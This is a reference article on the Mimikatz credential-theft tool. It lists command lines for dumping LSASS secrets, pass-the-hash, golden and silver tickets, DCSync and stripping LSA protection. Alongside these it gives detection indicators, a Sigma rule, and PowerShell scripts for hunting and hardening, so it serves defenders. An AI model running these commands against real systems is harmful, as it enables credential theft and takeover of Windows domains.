Mimikatz
Mimikatz is a post-exploitation tool created by Benjamin Delpy that extracts plaintext passwords, NTLM hashes, and Kerberos tickets from the memory of Windows systems and reuses them for pass-the-hash, pass-the-ticket and forged-ticket attacks. It is used by penetration testers and red teams as well as by ransomware operators and state-sponsored groups.
What is Mimikatz?
Mimikatz Definition
Mimikatz is an open-source Windows security audit tool created in 2007 by French researcher Benjamin Delpy (known as “gentilkiwi”). The tool demonstrates weaknesses in Windows authentication mechanisms, enabling extraction of credentials from operating system memory.
History and Purpose
Genesis
2007 - Benjamin Delpy creates Mimikatz
↓
Goal: Demonstrate Windows Authentication weaknesses
↓
Microsoft initially ignores reports
↓
Tool becomes popular in pentesting
↓
2017 - Credential-theft code derived from Mimikatz used by NotPetya to spread across networks (WannaCry, the same year, relied on the EternalBlue SMB exploit alone and did not use Mimikatz)
Controversy
Mimikatz is a dual-use tool:
- Legal use - penetration testing, red teaming, research
- Illegal use - attacks, data theft, ransomware
How Does Mimikatz Work?
Mechanism
Mimikatz relies on the fact that LSASS (Local Security Authority Subsystem Service), the process that handles interactive and network logons, keeps secrets in its memory for as long as a user is logged on so that single sign-on keeps working. Each authentication package caches different material:
LSASS (lsass.exe)
├── Plaintext passwords (WDigest and TsPkg providers, on by default before Windows 8.1 / Server 2012 R2)
├── NTLM hashes (MSV1_0 package; enough on their own for pass-the-hash)
├── Kerberos tickets and session keys (TGT and service tickets)
├── WDigest credentials (only where UseLogonCredential is enabled)
└── DPAPI master keys and other encryption keys
Requirements
- Local administrator rights with SeDebugPrivilege (privilege::debug in Mimikatz), or a SYSTEM token; a standard user cannot open lsass.exe
- A handle to the LSASS process, or an offline LSASS minidump taken from the target and loaded with sekurlsa::minidump
- LSA Protection (RunAsPPL) and Credential Guard disabled for full functionality: with Credential Guard the NTLM hashes and Kerberos keys live in the isolated LSA process, so LSASS no longer holds usable copies and sekurlsa returns nothing useful for those users
Main Modules and Commands
sekurlsa - Credential Extraction
Run privilege::debug first (or start Mimikatz as SYSTEM); without SeDebugPrivilege the module cannot open lsass.exe and reports a permission error.
sekurlsa::logonpasswords
- Displays passwords, hashes, and tickets of every logon session still held in LSASS, grouped by authentication package
sekurlsa::wdigest
- Extracts WDigest credentials (plaintext on older Windows, or on any host where UseLogonCredential=1)
sekurlsa::kerberos
- Displays credentials cached by the Kerberos package; sekurlsa::tickets /export writes the tickets themselves to .kirbi files
sekurlsa::msv
- Shows NTLM (and SHA1) hashes from the MSV1_0 package
kerberos - Kerberos Attacks
kerberos::list /export
- List the Kerberos tickets of the current logon session (no admin rights needed); /export writes them as .kirbi files
kerberos::ptt ticket.kirbi
- Pass-the-Ticket: inject a ticket into the current session
kerberos::golden /user:... /domain:... /sid:... /krbtgt:...
- Create a Golden Ticket (forged TGT signed with the KRBTGT key, domain-wide access)
kerberos::golden /user:... /domain:... /sid:... /target:... /service:... /rc4:...
- Create a Silver Ticket (forged service ticket for one service on one host); there is no separate kerberos::silver command, the same module is used with /target and /service
lsadump - SAM/NTDS Dump
lsadump::sam
- Dump the local SAM database (local account NTLM hashes); needs token::elevate or a SYSTEM token
lsadump::dcsync
- Act as a Domain Controller and pull account secrets from AD through the replication protocol, without touching NTDS.dit or LSASS on the DC
lsadump::lsa /patch
- Dump account hashes through LSA (on a domain controller, every domain account); lsadump::secrets dumps the LSA secrets themselves (service account and auto-logon passwords, the machine account password)
Attack Techniques
Pass-the-Hash (PtH)
1. Extract the NTLM hash with Mimikatz (sekurlsa::msv or lsadump)
2. Start a process whose network logons use that hash; no password is needed because NTLM authentication only ever proves knowledge of the hash
3. Access resources as the victim (SMB shares, WMI, RDP in Restricted Admin mode)
sekurlsa::pth /user:admin /domain:corp /ntlm:hash /run:powershell.exe
The spawned process still shows the original user locally but authenticates over the network as admin. Each such injection appears on the source host as Event ID 4624 with logon type 9 (NewCredentials) and logon process seclogo, a useful detection hook.
Pass-the-Ticket (PtT)
1. Extract Kerberos ticket
2. Import ticket into own session
3. Access services as victim
kerberos::ptt ticket.kirbi
Golden Ticket
1. Obtain the KRBTGT account NTLM hash (DCSync, a copy of NTDS.dit, or LSASS on a DC)
2. Forge a TGT for any user with any group memberships in the PAC
3. Domain-wide access that survives password changes of every account except KRBTGT; Mimikatz stamps the ticket with a 10-year lifetime and the KDC does not check that lifetime against domain policy
kerberos::golden /user:Administrator /domain:corp.local
/sid:S-1-5-21-... /krbtgt:hash /ptt
Only resetting the KRBTGT password twice invalidates these tickets.
Silver Ticket
1. Obtain the NTLM hash of the account that runs the service (the computer account for CIFS, HOST and RPCSS; a service account for the SPNs it owns)
2. Forge a service ticket (TGS) for that service, encrypted with that hash
3. Access to that one service on that one host; the KDC is never contacted, so the domain controllers log nothing
kerberos::golden /user:user /domain:corp.local
/sid:S-1-5-21-... /target:server.corp.local
/service:cifs /rc4:hash /ptt
Rotating the computer account password (every 30 days by default) ends the ticket's usefulness.
DCSync
Domain Controller simulation over the directory replication protocol (MS-DRSR):
1. Mimikatz, running as an account that holds the Replicating Directory Changes and Replicating Directory Changes All rights (Domain Admins, Enterprise Admins and DC computer accounts have them by default), binds to a DC over RPC
2. Calls DRSGetNCChanges to request the account object
3. Receives the account's NTLM hash, Kerberos keys and password history, exactly as a replication partner would
lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /user:krbtgt
The second form is the usual first step of a Golden Ticket; /all /csv dumps every account. On the DC this surfaces as Event ID 4662 carrying the replication control-access GUIDs, requested by a subject that is not a domain controller.
Detecting Mimikatz
Indicators of Compromise (IoC)
Files:
- mimikatz.exe (usually renamed, so match on hash, imports or strings rather than file name)
- mimilib.dll (SSP / password-filter DLL that captures passwords at logon)
- mimidrv.sys (kernel driver used to strip protections such as PPL)
Processes:
- Handles to lsass.exe opened by processes other than the OS and the endpoint security agent, in particular with PROCESS_VM_READ (mask 0x1010 or 0x1410 is the classic Mimikatz signature; 0x1FFFFF is typical of full minidumps)
- LSASS minidumps written by procdump, Task Manager, comsvcs.dll MiniDump or similar tooling
- Mimikatz module names (sekurlsa, lsadump, kerberos::ptt) on a command line or in PowerShell script block logs (Invoke-Mimikatz)
Logs:
- Event ID 4624 logon type 9 (NewCredentials) with logon process seclogo: pass-the-hash via sekurlsa::pth
- Event ID 4672 (special privileges assigned) and 4648 (explicit credentials) from unexpected hosts or accounts
- Event ID 4662 with replication control-access rights requested by a non-DC account: DCSync
- Event ID 4769 service-ticket requests for a user with no corresponding 4768 TGT request: Golden Ticket use
- Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe
Detection Tools
| Tool | Capabilities |
|---|---|
| Windows Defender | Signature detection plus the ASR rule "Block credential stealing from the Windows local security authority subsystem", which blocks reads of LSASS memory |
| Sysmon | Event ID 10 ProcessAccess on lsass.exe (source image, granted access mask, call stack) |
| EDR | Behavioral detection (LSASS handle opens, minidump writes, in-memory Mimikatz) |
| YARA rules | Binary and memory signatures for the Mimikatz PE, renamed builds included |
| Sigma rules | Log detection (process creation, Sysmon, Security log) |
Sigma Rule
title: Mimikatz Command Line Detection
status: stable
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'sekurlsa'
            - 'kerberos::ptt'
            - 'lsadump::dcsync'
    condition: selection
Command-line matching catches only operators who type the module names. Mimikatz run from a renamed binary with a script file, or loaded in memory through Invoke-Mimikatz, produces nothing here, which is why LSASS-access telemetry (Sysmon Event ID 10) and the 4662/4624 indicators above carry more weight.
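The Sigma rule above only fires when an operator types the module names. The following PowerShell script is an added example written for this page (not Mimikatz, Sigma or Microsoft code) that hunts for the two highest-signal log indicators from this section: Sysmon Event ID 10 handles to lsass.exe carrying PROCESS_VM_READ from processes outside an allowlist, and Security Event ID 4662 requests for the directory replication control-access rights (DCSync) from accounts that are not domain controllers. It runs against constructed sample events so it can be tried offline; the allowlist, the domain controller account name DC01$ and the sample image paths are assumptions to adjust for your estate, while the replication GUIDs are the real AD schema values.

```powershell
# Added example for this page; not code from Mimikatz, Sigma or Microsoft.
# Hunts two Mimikatz indicators in Windows event XML:
#   1. Sysmon Event ID 10: a process opens lsass.exe with PROCESS_VM_READ (0x10)
#   2. Security Event ID 4662: DS replication rights requested by a non-DC (DCSync)

# Control-access right GUIDs that DCSync needs (real AD schema values)
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'    # DS-Replication-Get-Changes-In-Filtered-Set
)
# Images expected to read LSASS on this estate (assumption: tune per environment)
$AllowedLsassReaders = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Program Files\Windows Defender\MsMpEng.exe'
)

function ConvertFrom-EventXml {
    # Flatten the <Data Name=...> pairs and the EventID of one event into a hashtable
    param([Parameter(Mandatory)][string]$Xml)
    $doc = [xml]$Xml
    $e = @{}
    foreach ($d in $doc.Event.EventData.Data) { $e[$d.Name] = $d.'#text' }
    $id = $doc.Event.System.EventID            # plain string, or an element when Qualifiers= is present
    $e['EventId'] = if ($id -is [string]) { [int]$id } else { [int]$id.'#text' }
    return $e
}

function Test-LsassAccess {
    # Sysmon 10: flag non-allowlisted processes that can read lsass.exe memory
    param([hashtable]$E)
    if ($E.EventId -ne 10 -or $E.TargetImage -notmatch '\\lsass\.exe$') { return $null }
    if ($E.SourceImage -in $AllowedLsassReaders) { return $null }
    $access  = [Convert]::ToInt32($E.GrantedAccess, 16)      # Sysmon logs "0x1010" style masks
    $reasons = @()
    if ($access -band 0x0010) { $reasons += 'PROCESS_VM_READ requested' }            # needed to read secrets
    if ($E.CallTrace -match 'UNKNOWN') { $reasons += 'unbacked code in call stack' } # injected / reflective loader
    if (-not $reasons) { return $null }
    [pscustomobject]@{ Rule = 'LSASS access'; Subject = $E.SourceImage
                       Detail = "GrantedAccess=$($E.GrantedAccess); $($reasons -join ', ')" }
}

function Test-DcSync {
    # 4662: replication rights used by an account that is not a domain controller
    param([hashtable]$E, [string[]]$DomainControllerAccounts)
    if ($E.EventId -ne 4662) { return $null }
    if ($E.Properties -notmatch ($ReplicationGuids -join '|')) { return $null }
    if ($E.SubjectUserName -in $DomainControllerAccounts) { return $null }    # DCs replicate legitimately
    [pscustomobject]@{ Rule = 'DCSync'; Subject = "$($E.SubjectDomainName)\$($E.SubjectUserName)"
                       Detail = "replication rights on $($E.ObjectName)" }
}

function Invoke-MimikatzHunt {
    param([string[]]$EventXml, [string[]]$DcAccounts = @('DC01$'))   # DC01$ is an assumed DC account name
    foreach ($x in $EventXml) {
        $e = ConvertFrom-EventXml -Xml $x
        Test-LsassAccess -E $e
        Test-DcSync -E $e -DomainControllerAccounts $DcAccounts
    }
}

function Get-LiveEventXml {
    # Real logs: Sysmon must be installed; 4662 needs "Audit Directory Service Access" enabled on the DCs
    foreach ($f in @(@{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 },
                     @{ LogName = 'Security'; Id = 4662 })) {
        Get-WinEvent -FilterHashtable $f -MaxEvents 5000 -ErrorAction SilentlyContinue |
            ForEach-Object { $_.ToXml() }
    }
}

# Constructed sample events (not real telemetry); the event XML namespace is omitted for brevity
$mimikatzRead = @'
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\Users\bob\Downloads\m.exe</Data>
<Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1010</Data>
<Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+9c534|UNKNOWN(000001F2C3A0)</Data>
</EventData></Event>
'@
$defenderRead = @'
<Event><System><EventID>10</EventID></System><EventData>
<Data Name="SourceImage">C:\Program Files\Windows Defender\MsMpEng.exe</Data>
<Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
<Data Name="GrantedAccess">0x1010</Data>
<Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\KERNELBASE.dll+2c8ce</Data>
</EventData></Event>
'@
$dcsync = @'
<Event><System><EventID>4662</EventID></System><EventData>
<Data Name="SubjectUserName">bob</Data>
<Data Name="SubjectDomainName">CORP</Data>
<Data Name="ObjectName">DC=corp,DC=local</Data>
<Data Name="Properties">{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}</Data>
</EventData></Event>
'@

Invoke-MimikatzHunt -EventXml @($mimikatzRead, $defenderRead, $dcsync) | Format-Table -AutoSize
# Against real logs: Invoke-MimikatzHunt -EventXml (Get-LiveEventXml) | Format-Table -AutoSize
```

On the sample input the hunt returns two rows, an "LSASS access" finding for m.exe (VM_READ plus an unbacked frame in the call stack) and a "DCSync" finding for CORP\bob, while the allowlisted Defender engine is ignored. The allowlist is the knob that decides the false-positive rate: build it from a baseline of which images legitimately open LSASS on your builds rather than from this example.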
Protection Against Mimikatz
Credential Guard
# Enable Credential Guard (Windows 10/11 Enterprise and Education; on by default on Windows 11 22H2+ Enterprise)
# Requires: 64-bit Windows, UEFI with Secure Boot, CPU virtualization extensions for VBS; TPM 2.0 recommended
# Check status: SecurityServicesRunning contains 1 when Credential Guard is running (2 = HVCI)
(Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning
Credential Guard moves NTLM hashes, Kerberos keys and TGTs into an isolated LSA process (LsaIso.exe) protected by the hypervisor, so Mimikatz running in the normal OS cannot read them even as SYSTEM. It does not protect local (SAM) accounts, and it does not stop an attacker already on the box from acting within the logged-on user's session.
LSA Protection
Windows Registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
RunAsPPL = 1 (REG_DWORD; on Windows 11 the value 2 enables it without the UEFI lock, and recent Windows 11 builds enable it by default on clean installs)
Runs lsass.exe as a Protected Process Light, so only signed, protected-process-capable code can open it with read access; sekurlsa::logonpasswords then fails with an access-denied error. The protection is enforced by the kernel, so a kernel driver can remove it again (Mimikatz ships mimidrv.sys and the !processprotect /process:lsass.exe /remove command for exactly that). Combine RunAsPPL with HVCI and Microsoft's vulnerable-driver blocklist, and alert on any driver load on a workstation.
Disable WDigest
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential = 0 (REG_DWORD)
Stops LSASS from keeping a plaintext copy of the password for the WDigest provider. Windows 8.1 / Server 2012 R2 and later default to 0; Windows 7, 8, Server 2008 R2 and 2012 need update KB2871997 before the value is honored. Monitor the value as well: setting it to 1 and waiting for the next logon is a common attacker trick for getting plaintext passwords back on a hardened host.
Group Policy Configuration
Computer Configuration > Administrative Templates > System > Credentials Delegation
├── Restrict delegation of credentials to remote servers (require Restricted Admin or Remote Credential Guard, so the user's credentials never reach the RDP target)
├── Remote host allows delegation of non-exportable credentials (server side of Remote Credential Guard)
└── Deny delegating default / saved / fresh credentials (stops CredSSP from sending reusable credentials to the listed hosts)
The first setting matters most against Mimikatz: with Restricted Admin or Remote Credential Guard an administrator's RDP session leaves no reusable credentials in LSASS on the remote host. Note that Restricted Admin mode also lets an attacker open an RDP session with only an NTLM hash, so pair it with network restrictions on who may reach RDP.
Protected Users Group
Add critical accounts (domain admins, tier-0 operators) to the "Protected Users" group:
- No credential caching: no cached logon verifier for offline logon, no plaintext or NTLM hash kept by WDigest or CredSSP
- Kerberos only: NTLM authentication is refused and DES/RC4 are disabled, so the account cannot be used with pass-the-hash
- No Kerberos delegation, constrained or unconstrained
- TGT lifetime of 4 hours instead of 10, non-renewable
The domain-side rules require Windows Server 2012 R2 domain controllers (client-side rules apply from Windows 8.1 / 2012 R2). Do not add service or computer accounts, and keep a break-glass account outside the group: members cannot log on when no domain controller is reachable.
Best Practices
For Administrators
- Deploy Credential Guard - credential isolation
- Enable LSA Protection - LSASS protection
- Disable WDigest - no plaintext
- Limit privileges - least privilege
- Monitor LSASS - access and memory dumps
- Use Protected Users - for admins
- Rotate the KRBTGT password twice yearly, with two resets each time and AD replication between them, because the KDC still accepts tickets encrypted with the previous password; the same double reset is how outstanding golden tickets are invalidated after an incident
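An added PowerShell audit, written for this page rather than taken from Microsoft or Mimikatz, that checks the hardening settings listed above on the local host: RunAsPPL, WDigest UseLogonCredential, the Credential Guard and HVCI state from Win32_DeviceGuard, and the Defender ASR rule that blocks LSASS credential theft. With -IncludeDomain and the ActiveDirectory module it also reports the KRBTGT password age and any Domain Admins member missing from Protected Users. The 180-day threshold (matching the twice-yearly rotation above) is an assumption; the ASR rule GUID is Microsoft's published identifier for that rule. Run it elevated.

```powershell
# Added example for this page; not Microsoft or Mimikatz code. Run in an elevated PowerShell.
# Audits the anti-Mimikatz settings described above and returns one PASS/FAIL row per check.

$AsrLsassRule = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'   # Defender ASR "Block credential stealing from lsass.exe"

function Get-RegistryValue {
    # Returns the value, or $null when the key or value does not exist
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function New-Finding {
    param([string]$Check, [bool]$Pass, [string]$Actual, [string]$Expected)
    $status = if ($Pass) { 'PASS' } else { 'FAIL' }
    [pscustomobject]@{ Check = $Check; Status = $status; Actual = $Actual; Expected = $Expected }
}

function Test-AntiMimikatzConfig {
    param(
        [switch]$IncludeDomain,          # needs the ActiveDirectory module and domain read rights
        [int]$MaxKrbtgtAgeDays = 180     # assumption: twice-yearly rotation
    )

    # LSA Protection: 1 = PPL with UEFI lock, 2 = PPL without UEFI lock (Windows 11)
    $ppl = Get-RegistryValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'
    $pplText = if ($null -eq $ppl) { 'not set' } else { "$ppl" }
    New-Finding 'LSA Protection (RunAsPPL)' ($ppl -in @(1, 2)) $pplText '1 or 2'

    # WDigest: anything but an explicit 0 leaves room for plaintext passwords in LSASS
    $wd = Get-RegistryValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    $wdText = if ($null -eq $wd) { 'not set' } else { "$wd" }
    New-Finding 'WDigest UseLogonCredential' ($wd -eq 0) $wdText '0'

    # Credential Guard: SecurityServicesRunning contains 1 when it is running (2 = HVCI)
    $dg = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
    $running = @($dg.SecurityServicesRunning)
    New-Finding 'Credential Guard running' ($running -contains 1) ($running -join ',') 'contains 1'
    New-Finding 'HVCI running' ($running -contains 2) ($running -join ',') 'contains 2'

    # Defender ASR rule for LSASS: action 1 = Block (0 = off, 2 = audit, 6 = warn)
    $mp = if (Get-Command Get-MpPreference -ErrorAction SilentlyContinue) { Get-MpPreference } else { $null }
    $ids = @($mp.AttackSurfaceReductionRules_Ids); $acts = @($mp.AttackSurfaceReductionRules_Actions)
    $asrAction = 'not configured'
    for ($i = 0; $i -lt $ids.Count; $i++) { if ($ids[$i] -ieq $AsrLsassRule) { $asrAction = "$($acts[$i])" } }
    New-Finding 'ASR: block LSASS credential theft' ($asrAction -eq '1') $asrAction '1 (Block)'

    if ($IncludeDomain -and (Get-Command Get-ADUser -ErrorAction SilentlyContinue)) {
        # KRBTGT age: golden tickets stay valid until this password has been reset twice
        $krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
        $age = (New-TimeSpan -Start $krbtgt.PasswordLastSet -End (Get-Date)).Days
        New-Finding 'KRBTGT password age (days)' ($age -le $MaxKrbtgtAgeDays) "$age" "<= $MaxKrbtgtAgeDays"

        # Every user in Domain Admins should be in Protected Users (service/computer accounts must not be)
        $protected = @((Get-ADGroupMember -Identity 'Protected Users' -Recursive).SamAccountName)
        $missing = @(Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
            Where-Object { $_.objectClass -eq 'user' -and $_.SamAccountName -notin $protected } |
            ForEach-Object { $_.SamAccountName })
        New-Finding 'Domain Admins in Protected Users' ($missing.Count -eq 0) ($missing -join ', ') 'none missing'
    }
}

Test-AntiMimikatzConfig | Format-Table -AutoSize
# With the ActiveDirectory module on a domain-joined admin host:
# Test-AntiMimikatzConfig -IncludeDomain | Format-Table -AutoSize
```

A FAIL on "Credential Guard running" with PASS on RunAsPPL is the common state on older hardware, and it is the weaker one: PPL can be stripped by a kernel driver, while Credential Guard takes the secrets out of LSASS altogether. Run the audit as a scheduled compliance check rather than once, since UseLogonCredential and RunAsPPL are registry values an attacker with admin rights can flip back.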
For SOC/Blue Team
- Event Log monitoring - 4624 (logon type 9 with seclogo), 4672, 4648, 4662 (replication rights), 4769 without a matching 4768
- Sysmon Event ID 10 - handles to lsass.exe with PROCESS_VM_READ from unexpected images
- EDR/XDR - behavioral detection (LSASS access, minidump writes, in-memory Mimikatz)
- Threat Hunting - proactive searching for renamed binaries and Invoke-Mimikatz in PowerShell script block logs
- Network monitoring - DRSUAPI (MS-DRSR) replication traffic to a DC from any host that is not a domain controller
For Red Team
Mimikatz is an educational tool for:
- Penetration testing (with authorization)
- Red team exercises
- Security research
- Security verification
Mimikatz Alternatives
| Tool | Description |
|---|---|
| Rubeus | Kerberos attacks in C# (ticket requests, Kerberoasting, pass-the-ticket, S4U abuse) |
| Impacket | Python; secretsdump.py performs remote SAM/LSA/NTDS dumps and DCSync over the network without dropping code on the target |
| SharpKatz | C# port of the sekurlsa and lsadump functionality |
| SafetyKatz | Writes an LSASS minidump and runs an embedded Mimikatz on it from memory to avoid on-disk signatures |
| Pypykatz | Pure-Python implementation; parses LSASS minidumps and registry hives offline on any OS |
Mimikatz remains one of the most important tools in security professionals’ arsenal, demonstrating Windows architectural weaknesses and motivating Microsoft to continuously improve security.